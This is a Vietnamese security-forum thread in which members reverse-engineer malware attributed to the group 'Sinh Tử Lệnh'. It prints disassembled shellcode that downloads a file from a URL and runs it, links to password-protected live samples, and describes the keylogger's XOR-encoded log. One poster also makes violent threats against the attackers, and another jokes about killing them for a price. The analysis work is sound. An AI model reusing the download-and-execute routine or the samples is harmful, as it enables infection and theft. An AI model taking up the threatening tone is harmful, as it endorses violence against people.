debug008:0014908F  674 call    [ebp+GetProcAddress]
debug008:0014908F
debug008:00149095  674 cmp     eax, 0
debug008:00149098  674 jz      @@Terminate
debug008:00149098
debug008:0014909E  674 mov     [ebp+GetTempFileNameW], eax
debug008:001490A4  674 lea     ebx, [ebp+szTempDir]
debug008:001490AA  674 push    ebx
debug008:001490AB  678 push    104h
debug008:001490B0  67C call    [ebp+GetTempPathW]
debug008:001490B0
debug008:001490B6  67C push    ebx
debug008:001490B7  680 push    0
debug008:001490B9  684 push    0
debug008:001490BB  688 push    ebx
debug008:001490BC  68C call    [ebp+GetTempFileNameW]
debug008:001490BC
debug008:001490C2  68C sub     esp, 1000h
debug008:001490C8  168C push    0
debug008:001490CA  1690 push    0
debug008:001490CC  1694 lea     ebx, [ebp+szTempDir]
debug008:001490D2  1694 push    ebx
debug008:001490D3  1698 lea     ebx, [ebp+szURL]
debug008:001490D9  1698 push    ebx
debug008:001490DA  169C push    0
debug008:001490DC  16A0 call    [ebp+URLDownloadToFile]
debug008:001490DC
debug008:001490E2  16A0 add     esp, 1000h
debug008:001490E8  6A0 cmp     eax, 0
debug008:001490EB  6A0 jnz     @@Terminate
debug008:001490EB
debug008:001490F1  6A0 mov     [ebp+szCreateProcessW], 'aerC'
debug008:001490FB  6A0 mov     [ebp+var_3D8], 'rPet'
debug008:00149105  6A0 mov     [ebp+var_3D4], 'seco'
debug008:0014910F  6A0 mov     [ebp+var_3D0], 'Ws'
debug008:00149118  6A0 mov     [ebp+var_3CE], 0
debug008:0014911F  6A0 mov     [ebp+CreateProcessW], 0
debug008:00149129  6A0 lea     eax, [ebp+szCreateProcessW]
debug008:0014912F  6A0 push    eax
debug008:00149130  6A4 push    [ebp+hKernel32]
debug008:00149136  6A8 call    [ebp+GetProcAddress]
debug008:00149136
debug008:0014913C  6A8 cmp     eax, 0
debug008:0014913F  6A8 jz      short @@Terminate
debug008:0014913F
debug008:00149141  6A8 mov     [ebp+CreateProcessW], eax
debug008:00149147  6A8 push    44h
debug008:00149149  6AC lea     eax, [ebp+buffer1]
debug008:0014914F  6AC push    eax
debug008:00149150  6B0 call    [ebp+RtlZeroMemory]
debug008:00149150
debug008:00149156  6B0 mov     eax, 44h
debug008:0014915B  6B0 mov     [ebp+buffer1], eax
debug008:00149161  6B0 push    10h
debug008:00149163  6B4 lea     eax, [ebp+buffer2]
debug008:00149169  6B4 push    eax
debug008:0014916A  6B8 call    [ebp+RtlZeroMemory]
debug008:0014916A
debug008:00149170  6B8 lea     eax, [ebp+buffer2]
debug008:00149176  6B8 push    eax
debug008:00149177  6BC lea     eax, [ebp+buffer1]
debug008:0014917D  6BC push    eax
debug008:0014917E  6C0 push    0
debug008:00149180  6C4 push    0
debug008:00149182  6C8 push    0
debug008:00149184  6CC push    0
debug008:00149186  6D0 push    0
debug008:00149188  6D4 push    0
debug008:0014918A  6D8 push    0
debug008:0014918C  6DC lea     eax, [ebp+szTempDir]
debug008:00149192  6DC push    eax
debug008:00149193  6E0 call    [ebp+CreateProcessW]
debug008:00149193
debug008:00149199
debug008:00149199      @@Terminate:                            ; CODE XREF: ShellcodeProc+481j
debug008:00149199                                              ; ShellcodeProc+4B6j
debug008:00149199                                              ; ShellcodeProc+4D8j
debug008:00149199                                              ; ShellcodeProc+4FAj
debug008:00149199                                              ; ShellcodeProc+51Cj
debug008:00149199                                              ; ShellcodeProc+56Fj
debug008:00149199                                              ; ShellcodeProc+5C3j
debug008:00149199  6E0 mov     [ebp+szTerminateProcess], 'mreT'
debug008:001491A3  6E0 mov     [ebp+var_464], 'tani'
debug008:001491AD  6E0 mov     [ebp+var_460], 'orPe'
debug008:001491B7  6E0 mov     [ebp+var_45C], 'ssec'
debug008:001491C1  6E0 mov     [ebp+var_458], 0
debug008:001491C8  6E0 lea     eax, [ebp+szTerminateProcess]
debug008:001491CE  6E0 push    eax
debug008:001491CF  6E4 push    [ebp+hKernel32]
debug008:001491D5  6E8 call    [ebp+GetProcAddress]
debug008:001491D5
debug008:001491DB  6E8 push    0
debug008:001491DD  6EC push    0FFFFFFFFh
debug008:001491DF  6F0 call    eax
debug008:001491DF
debug008:001491E1  6F0 retn

Thôi em tạm nghỉ đây, lúc khác em sẽ post tiếp về các keylog và bot của STL. Toàn bộ hình ảnh ở trên, file virus.doc và virus.exe, IDA 5.5 database, em post ở đây: http://www.mediafire.com/?ydsa6auc6v1asxj Password=malware Các file đã up virus.doc.bin và virus.exe em đã xoá, năm trong file HVAPost.rar hết.

RCE đám virus của Sinh Tử Lệnh.

conmale — GMT

Bài phân tích rất đã. Cám ơn TQN. Anh đã thay thể hình trên imagehacks với hình upload thẳng lên HVA để khỏi sợ mất hình minh hoạ. PS: em đang "vẽ đường cho hưu chạy"... rông hay chạy vô tròng vậy? -:-)

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Cảm ơn anh conmale. Câu PS của anh em không hiểu. Nhưng nếu cho tụi này vô tròng được thì em cũng cố gắng. Tụi này chơi bẩn, hù doạ thiên hạ, em ghét. Em chuẩn bị đi rồi. Ngoài nhà máy cũng có Internet nhưng không có bộ tool em đang dùng, nên về topic RCE keylog và botnet của STL em tạm dừng lại. Vào đây rồi làm tiếp. Em up lên mediafile 2 keylog của STL mà em có được: http://www.mediafire.com/?ubbeuryp38jc7qk. Password như cũ: malware. Anh em nào có IDA 5.5 trở lên có thể tiếp tục phân tích. 2 file keylog này tới nay KAV của em vẫn không detect ra. Điều này chứng tỏ điều gì, các anh em suy nghĩ thử ????? Các keylog và bot của STL đều có chung đặc điểm là: 1. Code = Visual C++ đời mới 2008, 2010 2. Dùng PE Compact để compress dll, exe file. (Nói nhỏ nhé: PE Compact nhét watermark về user trong file compacted đấy. Tiêu tụi mày rồi, nhưng nếu tui mày xài PE Compact cờ rắc thì em thua). 3. Export fake API COM DLL: DllCanUnloadNow, DllGetClassObject, DllRegisterServer, DllUnregisterServer. Các hàm này đa số đều return FALSE, chỉ 1 vài hàm làm công việc chính: keylog, inject... Em sẽ post tool để detect PE private info như: Date compile, source directory, compiler&linker version, MS Rich information lên sau. Tool này chỉ private share, có thể khi detect ra nó đụng chạm nhiều lắm. Phân tích các keylog này các bạn sẽ xác định được host của STL mà các keylog up key data lên. Tụi này dùng thuật toán mã hoá để mã hoác các URL string bèo lắm (lại sorry mấy đại ca STL nhé, em có gì sai sót bỏ qua nhé, đừng hại em !!!???). PS: Khách đâu mà lắm thế ??? Nếu hồi đó máy em có install Firewall xịn thì chắc đã không bị dính đòn tụi này rồi. Mấy lần install Comodo rồi lại uninstall ra, thấy nặng thêm máy, phiền phức quá. Kinh nghiệm rút ra: Không tin bất cứ file gì download về, phải scan, RCE, forrensic trước. Còn một vấn đề nữa, em nói luôn, nhờ ai đó giỏi tiếng Anh hay anh conmale gởi giùm file .doc đó cho MS để họ kiểm tra và fix bug (nếu có). Chứ em mà gởi thì tụi MS bò ra mà đọc tiếng Anh cùi của em, cười bể bụng thì sao. Rồi đám STL nhảy vào la làng mày cướp công của tao !!!???

RCE đám virus của Sinh Tử Lệnh.

minhhath — GMT

bài viết của anh hay lắm.em thì mê mấy vụ này lắm nhưng khổ nổi gần thi tốt nghiệp ra trường không có time timg hiểu nhiều,nhưng khi rảnh em sẻ ngâm cứu tiếp.đúng là không uổng công em tham gia thành viên,em hiểu biết nhiều hơn ở havonline này.em mến yêu havonlina

RCE đám virus của Sinh Tử Lệnh.

conmale — GMT

Và.... email gởi cái word doc đó đi từ đây:

Cũng là santrex.net (đã đề cập nhiều lần trong chủ đề "Vài thông tin về nhóm STL" trong mục "Các chủ đề khác") ;).

RCE đám virus của Sinh Tử Lệnh.

maithangbs — GMT

conmale wrote:

Bài phân tích rất đã. Cám ơn TQN. Anh đã thay thể hình trên imagehacks với hình upload thẳng lên HVA để khỏi sợ mất hình minh hoạ. PS: em đang "vẽ đường cho hưu chạy"... rông hay chạy vô tròng vậy? -:-)

Sao chả thấy hình đâu cả, bác conmale ơi? Edit: Giờ mới thấy :)

RCE đám virus của Sinh Tử Lệnh.

alakay — GMT

Anh quanta cho biết các câu lện thực hiện đựoc không, hi hi :D.

RCE đám virus của Sinh Tử Lệnh.

quanta — GMT

alakay wrote:

Anh quanta cho biết các câu lện thực hiện đựoc không, hi hi :D.

Lệnh gì bạn? Mình "nghịch" cho biết vậy thôi chứ cái này chưa đủ trình để ngâm cứu.

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Phong cách code của STL coder là pure C & API, không và rất ít dùng C++, C++ library... Cấp phát local buffer trên stack thiệt bự để khỏi overwrite. Các bạn thử RCE hai DLL keylog của STL sẽ thấy. Cái này có ai thấy quen quen không ha ?

RCE đám virus của Sinh Tử Lệnh.

alakay — GMT

quanta wrote:

alakay wrote:

Anh quanta cho biết các câu lện thực hiện đựoc không, hi hi :D.
Lệnh gì bạn? Mình "nghịch" cho biết vậy thôi chứ cái này chưa đủ trình để ngâm cứu.

Thì các câu lệnh giải nén, objdump ... em sợ làm o đúng lại bị dính chưởng :D.

RCE đám virus của Sinh Tử Lệnh.

xnohat — GMT

alakay wrote:

Thì các câu lệnh giải nén, objdump ... em sợ làm o đúng lại bị dính chưởng :D.

Sợ dính chưởng thì làm trên Máy ảo hoặc... nghỉ làm @TQN: bài phân tích quá đã, đọc sáng ra nhiều điều về Reverse ( mặc dù tớ là dân ngoại đạo về Reverse )

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Anh em nào đã, đang phân tích 2 file .dll keylog của STL mà em up lên mediafire ? Được gì thì post lên cho mọi người thảo luận cho đông vui, mình em độc diển buồn lắm.

RCE đám virus của Sinh Tử Lệnh.

quanta — GMT

Mình đang "quậy" trên Linux với: ghex2, okteta, bvi, xxd, objcopy, objdump, ... và đang thắc mắc ở một chỗ: sau khi copy đoạn hex từ 0xEE8D4 tới 0xEEF39, tạo ngược lại file .bin, sau đó không chuyển thành .exe mà lại thành .elf rồi load vào Evan's Debugger (http://www.codef00.com/projects) thì liệu mình vẫn có thể debug ra URL kia được không?

RCE đám virus của Sinh Tử Lệnh.

gsmth — GMT

quanta wrote:

Mình đang "quậy" trên Linux với: ghex2, okteta, bvi, xxd, objcopy, objdump, ... và đang thắc mắc ở một chỗ: sau khi copy đoạn hex từ 0xEE8D4 tới 0xEEF39, tạo ngược lại file .bin, sau đó không chuyển thành .exe mà lại thành .elf rồi load vào Evan's Debugger http://www.codef00.com/projects) thì liệu mình vẫn có thể debug ra URL kia được không?

Về bản chất thì được, bởi vì đoạn shellcode được viết bằng mã máy mà :D

RCE đám virus của Sinh Tử Lệnh.

chube — GMT

góp chút gạo hihi : - File HARDKBD.dll hồi 21/01/2011 được post lên virscan với result là 2 AV phát hiện : AntiVir : TR/Agent.RI.2 Dr Web: BackDoor.Trojan - Mới up vừa nãy thì chỉ còn 1 Dr Web còn detect. - Theo ThreatExpert (http://www.threatexpert.com/report.aspx?md5=fa9bfec1cbdbfec643021bf6bd943034) thì file HARDKBD.dll là file sinh ra do keygen maker for VMWare ( theo link bên trên) sinh ra cùng các file khác ( không biết có liên quan gì với file HARDKBD ở trên hay không vì cùng 13x KB) - như anh TQN đề cập, Entry Point bắt đầu với opcode 8BFF , mov edi,edi ==> 1 function prolog và theo ( http://www.openrce.org/forums/posts/470 ) thì prolog này cung cấp 5 byte tại start address, lí do thì để nguyên văn : ........... "...Five because that's the length of a "JMP XXXXXXXX", so those functions can be hotpatched without need to disassemble their prolog to figure out how many bytes need to be saved Anything wanting to hotpatch a function with such prolog can just override those first 5 known bytes "MOV EDI, EDI" and "PUSH EBP", jump elsewhere and jump back to the instruction starting in the 6th byte after issuing a "PUSH EBP" And very silly, but just in case you wonder why the "MOV EDI, EDI" that and not a NOP NOP sequence... it's simple, it's just one instruction as oposed to 2." .......... Và để biết thêm 1 số thông tin khác --> ( http://blogs.msdn.com/b/ishai/archive/2004/06/24/165143.aspx ) sory vì tiếng anh em kém hihi - file DLL kia em scan với PE Detective với result : PECompact v2.x --> bitsum technologies và bị avi chém - file DLL này scan với CFF dc 4 option: File is excutable , File is dll và 32 bit word machine và NX Compatible ( NX bit là gì thì vào đây : http://en.wikipedia.org/wiki/NX_bit) - View Header Info - > Magic : PE 32 , Time Date Stamp : 03/05/2010 8:34:43 Pointer Raw Data trỏ đến resource table là file xml:

RCE đám virus của Sinh Tử Lệnh.

sangteamtham — GMT

Bài viết sâu sắc. Nhưng không thấy hình ảnh gì cả. Làm ơn check lại giùm. Thanks

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Gởi tụi STL: 1. Tụi mày lớn hơn tao không mà xưng anh với tao ? 2. Tụi mày chơi trò quá bẩn, núp trong bóng tối, chơi trò ăn cắp pass bao nhiêu lâu rồi mà không thấy xấu hổ à. 3. Tụi mày tưởng hù doạ được tao à. Tao chỉ cần biết một thằng ngoài đời của tụi bây là thằng đó mất xác, khỏi đi tìm. 4. Mấy cái pass cho mấy cái forum, mail vớ vẫn ấy, tao PM cho tui bây cũng được, mất cái này tao tạo cái khác, tên tuổi của tao TQN thì dưới bất cứ nick gì vẫn là TQN. 5. Tui mày chơi bẩn, đợi tao đi xa mới dám tấn công à ? 6. Tui mày tưởng vào được cái xxxbank của tao là giỏi à ? Tụi mày vào đó chỉ xem được chi tiết giao dịch rút, chuyển tiền của tao chứ làm chó gì được. Muốn rút tiền của tao à ? Còn lâu, chữ ký, đt, CMND của tao không có thì đố tụi mày rút tiền được. Vậy mà còn nói dóc, vào rồi ra, để đức cho con cháu. Một ngày làm của tao bằng 10 tháng lương của 10 thằng làm ăn lương hèn hạ của tụi mày. Tao sẽ theo vụ này tới cùng, đừng để thằng nào gặp tao ngoài đường nhé, đệ của tao xả chết ráng chịu nhe. Thách cho tụi mày có chính quyền chống lưng, chơi trò rootkit, snip packet của tao ? PS: À quên, mạng của một thằng trong tụi mày cao lắm là 30 chai thôi, nhớ nhé !

RCE đám virus của Sinh Tử Lệnh.

vikjava — GMT

Hi anh, Vụ việc như thế nào mà anh nóng giận thế. Bớt nóng anh, làm vài lon ken cho hạ hoả

RCE đám virus của Sinh Tử Lệnh.

PXMMRF — GMT

TQN wrote:

Gởi tụi STL: 1. Tụi mày lớn hơn tao không mà xưng anh với tao ? 2. Tụi mày chơi trò quá bẩn, núp trong bóng tối, chơi trò ăn cắp pass bao nhiêu lâu rồi mà không thấy xấu hổ à. 3. Tụi mày tưởng hù doạ được tao à. Tao chỉ cần biết một thằng ngoài đời của tụi bây là thằng đó mất xác, khỏi đi tìm. 4. Mấy cái pass cho mấy cái forum, mail vớ vẫn ấy, tao PM cho tui bây cũng được, mất cái này tao tạo cái khác, tên tuổi của tao TQN thì dưới bất cứ nick gì vẫn là TQN. 5. Tui mày chơi bẩn, đợi tao đi xa mới dám tấn công à ? 6. Tui mày tưởng vào được cái xxxbank của tao là giỏi à ? Tụi mày vào đó chỉ xem được chi tiết giao dịch rút, chuyển tiền của tao chứ làm chó gì được. Muốn rút tiền của tao à ? Còn lâu, chữ ký, đt, CMND của tao không có thì đố tụi mày rút tiền được. Vậy mà còn nói dóc, vào rồi ra, để đức cho con cháu. Một ngày làm của tao bằng 10 tháng lương của 10 thằng làm ăn lương hèn hạ của tụi mày. Tao sẽ theo vụ này tới cùng, đừng để thằng nào gặp tao ngoài đường nhé, đệ của tao xả chết ráng chịu nhe. Thách cho tụi mày có chính quyền chống lưng, chơi trò rootkit, snip packet của tao ? PS: À quên, mạng của một thằng trong tụi mày cao lắm là 30 chai thôi, nhớ nhé !

(6) Đúng như vậy! Biết được username và password của người nào đó để vào đươc website của một ngân hàng Việt nam, thí dụ Vietcombank, thì chỉ biết được các thông tin sau: - Số tài khoản mà người đó đang dùng và đã từng dùng - Số dư trên tài khoản và giá trị có thể giao dịch trong số dư - Số lần và giá trị giao dịch mà chủ tài khoản đã thực hiện thời gian vừa qua Còn việc rút tiền (lấy cắp tiền) ra từ tài khoản thì không thể. Vì muốn rút tiền ra từ tài khoản, người rút phải làm 1 form xin rút tiền, ký tên vào form và trình cho ngân hàng giấy chứng minh hơp lệ. Nhân viên ngân hàng thường xem kỹ CMND và kiểm tra đối chiếu rất kỹ chữ ký trên form và chữ ký lưu tại ngân hàng (khi mở tài khoản). Chưa kể các nhân viên ngân hàng thường đã rất quen mặt khách hàng (do đã tiếp xúc nhiều lần) Vì thế việc lấy đươc username và pass. vào website ngân hàng, chỉ giống như đến đươc chân núi Everest mà thôi. Ở công ty tôi, khi đi công tác xa (nơi không có mạng Internet hay 3G), tôi thường nhờ một số anh em trong cơ quan kiểm tra hộ tài khoản cho mình. Công việc và giao dịch của TQN là hoàn toàn hợp pháp nên chẳng có gí phải quan tâm. Vả lai xin ngân hàng lai username mới và pass. mới là dễ dàng. (7) Theo chỗ mình biết thì chính quyền ta không để cho STL dưa lưng đâu. Những việc làm manh đông và không hợp pháp (vi phạm quyền công dân) thì chẳng ai muốn dính vào đâu. Nhưng một chính quyền khác hay một thế lực khác (không phải "ta") thì rất có thể, (vì có những lý do của việc đó)

RCE đám virus của Sinh Tử Lệnh.

conmale — GMT

TQN wrote:

Gởi tụi STL: 1. Tụi mày lớn hơn tao không mà xưng anh với tao ? 2. Tụi mày chơi trò quá bẩn, núp trong bóng tối, chơi trò ăn cắp pass bao nhiêu lâu rồi mà không thấy xấu hổ à. 3. Tụi mày tưởng hù doạ được tao à. Tao chỉ cần biết một thằng ngoài đời của tụi bây là thằng đó mất xác, khỏi đi tìm. 4. Mấy cái pass cho mấy cái forum, mail vớ vẫn ấy, tao PM cho tui bây cũng được, mất cái này tao tạo cái khác, tên tuổi của tao TQN thì dưới bất cứ nick gì vẫn là TQN. 5. Tui mày chơi bẩn, đợi tao đi xa mới dám tấn công à ? 6. Tui mày tưởng vào được cái xxxbank của tao là giỏi à ? Tụi mày vào đó chỉ xem được chi tiết giao dịch rút, chuyển tiền của tao chứ làm chó gì được. Muốn rút tiền của tao à ? Còn lâu, chữ ký, đt, CMND của tao không có thì đố tụi mày rút tiền được. Vậy mà còn nói dóc, vào rồi ra, để đức cho con cháu. Một ngày làm của tao bằng 10 tháng lương của 10 thằng làm ăn lương hèn hạ của tụi mày. Tao sẽ theo vụ này tới cùng, đừng để thằng nào gặp tao ngoài đường nhé, đệ của tao xả chết ráng chịu nhe. Thách cho tụi mày có chính quyền chống lưng, chơi trò rootkit, snip packet của tao ? PS: À quên, mạng của một thằng trong tụi mày cao lắm là 30 chai thôi, nhớ nhé !

Hì hì, bình tĩnh em. Những ai ký tên STL kia ít ra cũng đã làm cho em điên tiết lên vì những tiểu xảo ngôn ngữ. Bởi vậy, đừng mất bình tĩnh trước tiểu xảo ngôn ngữ bởi vì những thứ đó không có mấy giá trị. Vả lại, chính bọn họ đã sử dụng quá nhiều "tiểu xảo ngôn ngữ" từ đầu đến cuối rồi, có gì mới mẻ đâu? :P Hãy dùng khoa học và kỹ thuật để chứng minh sự thật và tạo điều kiện để mọi người tham gia thảo luận một cách chuyên môn và bổ ích. Những việc làm này nằm ở vị trí hoàn toàn khác với những công việc ăn cắp và sử dụng tiểu xảo ngôn ngữ.

RCE đám virus của Sinh Tử Lệnh.

gamma95 — GMT

TQN wrote:

Gởi tụi STL: 1. Tụi mày lớn hơn tao không mà xưng anh với tao ? 2. Tụi mày chơi trò quá bẩn, núp trong bóng tối, chơi trò ăn cắp pass bao nhiêu lâu rồi mà không thấy xấu hổ à. 3. Tụi mày tưởng hù doạ được tao à. Tao chỉ cần biết một thằng ngoài đời của tụi bây là thằng đó mất xác, khỏi đi tìm. 4. Mấy cái pass cho mấy cái forum, mail vớ vẫn ấy, tao PM cho tui bây cũng được, mất cái này tao tạo cái khác, tên tuổi của tao TQN thì dưới bất cứ nick gì vẫn là TQN. 5. Tui mày chơi bẩn, đợi tao đi xa mới dám tấn công à ? 6. Tui mày tưởng vào được cái xxxbank của tao là giỏi à ? Tụi mày vào đó chỉ xem được chi tiết giao dịch rút, chuyển tiền của tao chứ làm chó gì được. Muốn rút tiền của tao à ? Còn lâu, chữ ký, đt, CMND của tao không có thì đố tụi mày rút tiền được. Vậy mà còn nói dóc, vào rồi ra, để đức cho con cháu. Một ngày làm của tao bằng 10 tháng lương của 10 thằng làm ăn lương hèn hạ của tụi mày. Tao sẽ theo vụ này tới cùng, đừng để thằng nào gặp tao ngoài đường nhé, đệ của tao xả chết ráng chịu nhe. Thách cho tụi mày có chính quyền chống lưng, chơi trò rootkit, snip packet của tao ? PS: À quên, mạng của một thằng trong tụi mày cao lắm là 30 chai thôi, nhớ nhé !

Em báo giá lại cho anh là nếu em làm chỉ lấy 20 chai thôi, đạn AK dạo này mua rẻ vãi, có gì contact em nha :) PS: Các chú STL không biết sự vừa phải, việc làm của các chú dưới mức chấp nhận được của đạo đức căn bản, chứ đừng nói gì đến đạo đức của dân làm máy tính nói chung. Bản thân tôi rất muốn chơi công bằng với các chú đó (a.k.a Neo, a.k.a XXX ;-) ???)

RCE đám virus của Sinh Tử Lệnh.

DQHSpCr — GMT

TQN wrote:

Anh em nào đã, đang phân tích 2 file .dll keylog của STL mà em up lên mediafire ? Được gì thì post lên cho mọi người thảo luận cho đông vui, mình em độc diển buồn lắm.

Anh có thể up lại được không, mấy link đó hình như die rồi ! :-S

RCE đám virus của Sinh Tử Lệnh.

xnohat — GMT

Thú vị thật, có vẻ mấy chú STL này vẫn thường tham gia sinh hoạt tại HVA, vì topic này mới lên mạng toàn cầu được vài bữa thì đã có chú ti toe dở mánh. Bực mình khi có người nắm được thóp thì cứ tạo cái nick mới vào đây mà đấu trí, tiểu trí thì đấu khẩu cũng được, chi mà chơi ném đá dấu tay vậy ta

RCE đám virus của Sinh Tử Lệnh.

vikjava — GMT

Có lẽ anh TQN chưa đăng ký dịch vụ chuyển tiền qua ebanking. Quy định ngân hàng nhà nước hiện nay đối với dịch vụ chuyển tiền qua ebanking phải dùng xác thực mạnh như sms hoăc token Đối với SMS, trước có thông tin virus zeus có khả năng Defeated luôn. #:S - Xin hỏi đối với trường hợp các chương trình antivirus đều không phát hiện được, không có khả năng RCE như anh TQN. Đối với người quản trị hệ thống cần thực hiện những phương thức nào để có thể kiện toàn bảo mật cho hệ thống.

RCE đám virus của Sinh Tử Lệnh.

Ar0 — GMT

vikjava wrote:

- Xin hỏi đối với trường hợp các chương trình antivirus đều không phát hiện được, không có khả năng RCE như anh TQN. Đối với người quản trị hệ thống cần thực hiện những phương thức nào để có thể kiện toàn bảo mật cho hệ thống.

- Có những chính sách phù hợp về user và group, nên tuân theo các nguyên tắc như tối thiểu, ràng buộc, rõ ràng. (Quản lý phân quyển chặc chẽ, không tạo ra lỗ hổng phân quyền, không cấp quyền dư hoặc thiếu, có nhiều điều kiện ràng buộc giữa các user và group như passwd, chứng thực, quản lý log rõ ràng, dễ theo dõi, ...) - Quản lý tốt các dịch vụ, giới hạn trong khuôn khổ nhất định về tài nguyên và sự can thiệp vào trong hệ thống. (Quản lý quá trình chạy, config chặt chẽ, tối ưu về dịch vụ và quản lý quyền hạn, xây dựng hệ thống firewall quản lý các port, các dòng dữ liệ vào ra, quản lý sự can thiệp vào trong các tiến trình, dịch vụ khác, sự tương tác với các dịch vụ khác) - Thường xuyên giám sát hệ thống. - Xây dựng quy trình quản lý rủi ro. Vài ý nghĩ ra thôi, có gì thiếu sót vikjava và mọi người bổ sung nhé. :)

RCE đám virus của Sinh Tử Lệnh.

tmd — GMT

Về giám sát mạng ở phần cứng firewall,route,... Trong thông tin TQN có nói tới nó sẽ có truy suất tới 1 cái địa chỉ nào đó có trong mã độc. Hệ thống route/firewall hướng ra ngoài internet learn thấy một IP ngoại lai nào đó "mới" thì có cảnh báo cho người chuyên theo dõi. Chính sách hoạt động rõ ràng(con người và kỹ thuật) đi đôi đều giảm thiểu được phần lớn chuyện cá nhân tò mò.

RCE đám virus của Sinh Tử Lệnh.

vmtdttt — GMT

Vô muộn có mấy ngày mà hiện không còn link nào sống được cả. Các link mediafire mà TQN đăng lên bây giờ đều không vào được. Mong anh TQN, hoặc ai đó có mẫu up lại để mọi người cùng phân tích nhé...

RCE đám virus của Sinh Tử Lệnh.

quanta — GMT

Chắc anh TQN có ý tốt: sợ các bạn phân tích không cẩn thận lại "dính chưởng" nên xoá đi rồi.

RCE đám virus của Sinh Tử Lệnh.

vmtdttt — GMT

quanta wrote:

Sợ các bạn phân tích không cẩn thận lại "dính chưởng" nên xoá đi rồi.

:-O :-O :-O :-O :-O :-O :-O :-O :-O :-O Chắc không phải lý do này chứ, nếu mà lỡ có dính... cùng đường lắm thì nhờ các chuyên gia trên hva diệt giùm. Ai có mẫu up lên cho em ngó mặt một chút nhé.

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

3, 4 ngày nữa mình vào SG, mình sẽ úp lên hết lại tất cả những mẩu virus/malware của STL mà mình đang có cho mọi anh em IT, Reverser cùng vào phân tích. Mục đích cuối cùng cả chúng ta là sẽ góp phần nhỏ lật mặt nạ đám STL.

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Hì hì, cuối cùng cũng vào tới SG. Tối hôm qua, 11h đêm, đứng một mình ở ngoài đường của TP.BMT đón xe vào SG, mưa tầm tã, nghĩ khổ và tủi cho cái thân mình. Nhưng giờ cũng về rồi. Về tới SG, về tới nhà là nhẹ cả người. Việc đầu tiên, sửa chữa lặt vặt đèn đóm xong (sao cứ mình đi là đèn, điện hư), xong ngồi vào máy (tới giờ luôn). Si nghĩ, "tích phân" tình hình. - Việc đầu tiên: config lại modem, tắt wireless luôn. - Đổi tất cả pass login vào máy. - Uninstall KAV, update lên KIS 2011. - Tắt hết các service không cần thiết. Autoruns nào nghi ngho thì RCE luôn. - Khôi phục một loạt các password bị chôm. Cảm ơn tụi STL mày nhé. Tao lỳ đòn và kỹ tính có tiếng mà. Dể gì ba cái ăn cắp pass vớ vẫn của tụi bây mà tao sợ. Dể gì ăn cắp pass blog, facebook, mail của tao được. Mà trong đó có "chó" gì đâu mà cho tụi bây xem. Mấy cái blog của tao chỉ vỏn vẹn có 1 topic, 1 dòng về RCE do tao làm lười viết thì có cái gì. Bày đặt post TQN là TQN ơi nữa hả. Vào xem lại đi, tao xoá sạch cái post của tụi mày rồi. - Kiểm tra khi tao đi, thằng nào login vào hộp mail yahoo của tao. À thì ra tụi mày có thằng ở bên US à:

Tháng 5 28, 2011 10:25 AM Trình duy?t Ðang nh?p vào Mail PA, US Tháng 5 26, 2011 5:25 PM Trình duy?t Ðang nh?p vào Mail PA, US Tháng 5 26, 2011 12:32 PM Trình duy?t Ðang nh?p vào Mail PA, US Tháng 5 26, 2011 1:31 AM Trình duy?t Ðang nh?p vào Mail FL, US Tháng 5 26, 2011 1:27 AM Trình duy?t Truy c?p Mail VA, US Tháng 5 26, 2011 1:22 AM Trình duy?t Ðang nh?p vào Mail VA, US Tháng 5 26, 2011 12:20 AM Trình duy?t Truy c?p Mail PA, US

Tao công nhận là tao không phải là thằng chuyên về IT, trình độ của tao thì có hạn, về nhiều lãnh vực nào đó trong IT thì không bằng tụi mày, nhưng tao không mất đạo đức, khốn nạn như tụi mày, trình độ ăn cắp, phá hoại thì "em xin gọi anh là sư phụ". Tụi mày có tài giỏi nhưng mà không có đức thì cũng không bằng thằng ăn trộm, ăn cướp ngoài đường. Dân mà bắt được tụi mày thì nó đập chết cha tui mày luôn. PS: Sorry anh em mod, admin của HVA nhé, tính em nóng như Trương Phi, tức lên là ăn nói bạt mạng. Chúng ta sẽ cùng tiếp tục phân tích đám malware của tụi "Sống Chết theo lệnh" này.

11:00 AM Trình duyệt Đăng nhập CA, US

Chậm chân rồi mấy cu ơi. Chiều giờ, tui nó login liên tục vào mail Yahoo của em. Em sơ ý quá, quên lấy cái IP của tui nó, giờ vào thì chỉ còn log từ sáng tới giờ. Sorry anh em nhé.

RCE đám virus của Sinh Tử Lệnh.

phanledaivuong — GMT

Tụi này dốt rồi. gây án xong lại quay trở lại hiện trường =)) giống hệt cu Trần Đức Thiện hồi tết năm nay lừa đảo con Laptop cũng bị tóm vì login lại nick lừa đảo vào hh.vn =)) ngẫm cũng tội :( già rồi mà ng* =)) bị bác TQN làm cái 2pic này khích tướng :-<

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Mấy cái file em up lên mediafire, tụi này sau khi chôm đươc pass Yahoo của em đã login vào xoá sạch. Bây giờ em xin phép up lại: 1. File virus.doc + virus.exe: http://www.mediafire.com/?24238f1vktaswu8 2. File keylog và downloader của tụi này: http://www.mediafire.com/?ashngg5ae22qj3l Cả hai file đều có pwd là: malware. Đối với keylog, anh em không cần tập trung vào HARDKBD.DLL, chỉ nên tập trung vào wbmain_.dll. File HARDKBD.DLL chỉ là một keylog bình thường (hoặc hơn bình thường một chút). Mọi key press của victim sẽ được lưu vào thành file msdata.vxd, và toàn bộ file được xor với 0x6F. Nếu trên may các bạn có một HexEditor nào đó như WinHex, 101Editor, sau khi xor với 0x6F, các bạn sẽ thấy lại nội dung nguyên bản của file này. Code:

.text:10002B70 write_xor_0x6F_to_msdata_vxd_file proc near
.text:10002B70                                         ; CODE XREF: ThreadInLogOnUIExe+E0p
.text:10002B70                                         ; sub_10001560+99p
.text:10002B70                                         ; WinLogonThreadProc+2Dp
.text:10002B70                                         ; sub_10001AB0+87p
.text:10002B70                                         ; DllRegisterServer+17Ap
.text:10002B70                                         ; DllRegisterServer:loc_10002418p
.text:10002B70                                         ; sub_10002450+1D7p
.text:10002B70                                         ; sub_10002450+20Ep
.text:10002B70                                         ; sub_10002A10+138p
.text:10002B70
.text:10002B70 NumberOfBytesWritten= dword ptr -4
.text:10002B70 hFile   = dword ptr  8
.text:10002B70 pszTxt  = dword ptr  0Ch
.text:10002B70
.text:10002B70         push    ebp
.text:10002B71         mov     ebp, esp
